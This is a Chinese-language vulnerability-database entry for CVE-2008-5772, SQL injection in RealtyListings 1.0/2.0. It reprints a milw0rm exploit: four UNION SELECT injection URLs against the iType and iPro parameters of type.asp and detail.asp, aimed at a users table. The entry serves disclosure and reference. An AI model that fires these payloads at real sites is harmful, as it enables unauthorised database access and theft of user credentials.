RealtyListings 多参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117025 漏洞类型 SQL注入
发布时间 2008-12-14 更新时间 2009-01-29
CVE编号 CVE-2008-5772 CNNVD-ID CNNVD-200812-495
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7464
https://cxsecurity.com/issue/WLB-2009010110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-495
|漏洞详情
RealtyListings是一款针对房地产公司即时更新和展示房屋列表的软件。ASPSiteWareRealtyListings1.0和2.0版本存在多个SQL注入漏洞。远程攻击者可以借助(1)到type.asp的iType参数和(2)到detail.asp的iPro参数,来执行任意的SQL指令。
|漏洞EXP
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : RealtyListing V1/V2
#download : null
#Demo     : http://www.aspsiteware.com/Realty1
	    http://www.aspsiteware.com/realty2/realty2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users


###########################################################################

# milw0rm.com [2008-12-14]
|参考资料

来源:XF
名称:realtylisting-typedetail-sql-injection(47323)
链接:http://xforce.iss.net/xforce/xfdb/47323
来源:BID
名称:32812
链接:http://www.securityfocus.com/bid/32812
来源:MILW0RM
名称:7464
链接:http://www.milw0rm.com/exploits/7464
来源:SREASON
名称:4848
链接:http://securityreason.com/securityalert/4848
来源:SECUNIA
名称:33167
链接:http://secunia.com/advisories/33167
来源:OSVDB
名称:50708
链接:http://osvdb.org/50708
来源:OSVDB
名称:50707
链接:http://osvdb.org/50707